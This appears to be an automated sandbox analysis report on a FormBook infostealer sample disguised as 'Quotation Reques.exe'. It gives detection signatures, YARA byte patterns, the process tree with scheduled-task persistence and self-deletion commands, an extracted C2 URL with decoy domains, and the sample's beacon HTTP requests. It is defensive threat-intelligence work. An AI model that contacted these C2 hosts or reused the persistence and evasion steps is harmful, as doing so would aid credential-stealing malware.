Analysis Report Quotation Reques.exe

Overview

General Information

Sample Name: Quotation Reques.exe
Analysis ID: 356530
MD5: 5a752fcd71acb65c618a829610b7b7e1
SHA1: 1e0608c292a70e30f75308255d6039a8ca373d8a
SHA256: d96042b51f171f68a99d4568f311f267fe595df0add3851e162cbcee7f897edb
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Quotation Reques.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\Quotation Reques.exe' MD5: 5A752FCD71ACB65C618A829610B7B7E1)
    • schtasks.exe (PID: 6744 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Quotation Reques.exe (PID: 6788 cmdline: C:\Users\user\Desktop\Quotation Reques.exe MD5: 5A752FCD71ACB65C618A829610B7B7E1)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6776 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 7080 cmdline: /c del 'C:\Users\user\Desktop\Quotation Reques.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.valiantbranch.com/0wdn/"], "decoy": ["inclusivefamilybookshop.com", "hollyjmillsphotography.com", "mojavewellnessaz.com", "cookies-x.info", "trainingkanban.com", "tempoborough.life", "mayalv.com", "mbsgiftstore.com", "vanjele.com", "serieshaha.com", "jlbstructural.com", "topkids.asia", "thejoyofleather.com", "qvujxa.com", "anythinginworld.com", "danielablason.com", "smartphoneloops.com", "thisisauckland.com", "cityelectricals.com", "revati-thenoir.com", "beinglean.net", "bingomix.net", "africaglobalexim.com", "wayncalstore.com", "instentinotice.com", "wertzdesign.com", "mathewshea.world", "thedesailldada.com", "elinecoin.com", "xlkefu2.com", "nkdesigner.com", "0galleries.com", "ladresse-conceptpremium.com", "farrellforlegislature.com", "sphenecouture.com", "myloverhuier.com", "buildermarketingprogram.com", "ketonesconnect.com", "into.house", "crowdcrew.info", "inbox.ventures", "photomaker.pro", "homeswithkj.com", "companyincorporationlanka.com", "curbsidechauffeur.com", "xiangoshi.com", "n95brokers.com", "gurumanindustries.com", "calicarwraps.com", "shreeradheyassociates.com", "shopkonfection.com", "jadepalance.com", "videorv.com", "razpah.com", "redchillileeds.com", "samcarrt.com", "humangreens.com", "ficuswildlife.com", "dorteklarskov.com", "quitlikeaqueen.com", "shreedurgastore.com", "diabetessurgeryturkey.com", "promotionalplacements.com", "mercycaremanagement.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.Quotation Reques.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.Quotation Reques.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.Quotation Reques.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
6.2.Quotation Reques.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.Quotation Reques.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\Quotation Reques.exe', ParentImage: C:\Users\user\Desktop\Quotation Reques.exe, ParentProcessId: 6476, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', ProcessId: 6744

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 Avira URL Cloud: Label: malware
Found malware configuration
Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack Malware Configuration Extractor: FormBook (same C2 list and decoy list as given under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ftkqUsB.exe ReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: Quotation Reques.exe Virustotal: Detection: 26%
Source: Quotation Reques.exe ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match; File source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\ftkqUsB.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Quotation Reques.exe Joe Sandbox ML: detected
Source: 6.2.Quotation Reques.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: Quotation Reques.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Quotation Reques.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wntdll.pdbUGP source: Quotation Reques.exe, 00000006.00000002.299728528.000000000126F000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.494308304.00000000030AF000.00000040.00000001.sdmp
Source: Binary string: cmd.pdbUGP source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.490096400.0000000000380000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Quotation Reques.exe, cmd.exe
Source: Binary string: cmd.pdb source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0039245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 16_2_0039245C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003968BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 16_2_003968BA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0038B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 16_2_0038B89C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003885EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 16_2_003885EA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003A31DC FindFirstFileW,FindNextFileW,FindClose, 16_2_003A31DC
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_06B3EF30
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_06B3F220
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_06B3FE38
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_06B3FA20
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 4x nop then pop ebx 6_2_00406A9A
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 4x nop then pop edi 6_2_0041569C

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.valiantbranch.com/0wdn/
Source: global traffic HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 HTTP/1.1 Host: www.mojavewellnessaz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us HTTP/1.1 Host: www.ficuswildlife.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1 Host: www.thisisauckland.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1 Host: www.trainingkanban.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt HTTP/1.1 Host: www.sphenecouture.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 HTTP/1.1 Host: www.dorteklarskov.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1 Host: www.gurumanindustries.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 194.9.94.85
Source: Joe Sandbox View ASN Name: LOOPIASE
Source: Joe Sandbox View ASN Name: KRYSTALGR
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE
Source: unknown DNS traffic detected: queries for: www.diabetessurgeryturkey.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 23 Feb 2021 08:39:53 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Length: 1699 Content-Type: text/html (raw body hex omitted)
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/images/extra_pages/website.svg
Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/images/footer/logo-grey.png
Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
          Source: Quotation Reques.exe, 00000000.00000002.250833656.0000000000779000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
